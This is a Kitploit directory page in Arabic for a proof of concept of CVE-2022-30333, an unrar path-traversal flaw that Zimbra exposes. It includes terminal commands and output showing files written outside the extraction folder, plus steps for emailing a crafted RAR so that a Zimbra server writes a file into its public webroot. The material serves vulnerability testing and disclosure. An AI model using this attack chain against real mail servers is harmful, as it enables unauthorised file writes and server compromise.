Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-30333-PoC — إثبات مفهوم لاستغلال CVE-2022-30333، وهي ثغرة اجتياز المسار في أداة unrar المستخدمة من قبل Zimbra، توضح كتابة ملفات تعسفية عبر أرشيفات RAR مصممة خصيصًا. | Kitploit
أدوات/GitHubGitHub/thel1ghtvn/cve-2022-30333-poc
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubthel1ghtvn/cve-2022-30333-poc

CVE-2022-30333-PoC

إثبات مفهوم لاستغلال CVE-2022-30333، وهي ثغرة اجتياز المسار في أداة unrar المستخدمة من قبل Zimbra، توضح كتابة ملفات تعسفية عبر أرشيفات RAR مصممة خصيصًا.

عرض المستودع
133منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-30333-POC

ملف نموذجي لاختبار CVE-2022-30333

  • Sample.rar : إذا كنت تريد الاختبار على Linux. عند فك الضغط، يقوم بإنشاء trav في ../../tmp/traversed. يُرجى التأكد من وجود المجلد ../../tmp/traversed قبل فك ضغط Sample.rar

  • exp.rar : إذا كنت تريد الاختبار على خادم بريد Zimbra. عند فك الضغط، يقوم بإنشاء moo.txt في /opt/zimbra/jetty_base/webapps/zimbra/public/. يمكنك الوصول إلى هذا الملف عبر https://zimbra_mail_domain/public/moo.txt

خطوات الاستغلال

الاختبار على Linux

root@kitploit:~
mkdir ../../tmp/traversed (the destination folder must exsist before unrar)

ls -la ../../tmp/traversed/
total 8
drwxrwxr-x 2 ubuntu ubuntu 4096 Jul  4 02:44 .
drwxrwxr-x 4 ubuntu ubuntu 4096 Jul  4 02:40 ..

unrar x exp.rar

UNRAR 6.10 beta 1 freeware      Copyright (c) 1993-2021 Alexander Roshal

Corrupt header is found
sym - the file header is corrupt

Extracting from exp.rar

Corrupt header is found
sym - the file header is corrupt
Extracting  sym                                                       OK 
Extracting  sym/trav                                                  OK 
Total errors: 4

ls -la ../../tmp/traversed/
total 12
drwxrwxr-x 2 ubuntu ubuntu 4096 Jul  4 02:47 .
drwxrwxr-x 4 ubuntu ubuntu 4096 Jul  4 02:40 ..
-rw-rw-r-- 1 ubuntu ubuntu   14 Jul  4 02:34 trav

cat ../../tmp/traversed/trav
"traversed"

الاختبار على Zimbra

  • أنشئ بريدًا إلكترونيًا وأرفق ملف rar خبيث ثم أرسله إلى عنوان بريد Zimbra. سيتم فك ضغط ملف rar هذا أثناء تحليله باستخدام Amavisd.
  • يجب أن يكون moo.txt في: /opt/zimbra/jetty_base/webapps/zimbra/public/moo.txt أو https://zimbra_mail_domain/public/moo.txt

المراجع

  1. مدونة فيتنامية من DEV2SEC
  2. مدونة إنجليزية من Sonarsource
  3. شكر خاص إلى mrlihd لمساعدتي في إعادة بناء سلسلة الهجوم في Zimbra
تنزيل الأداة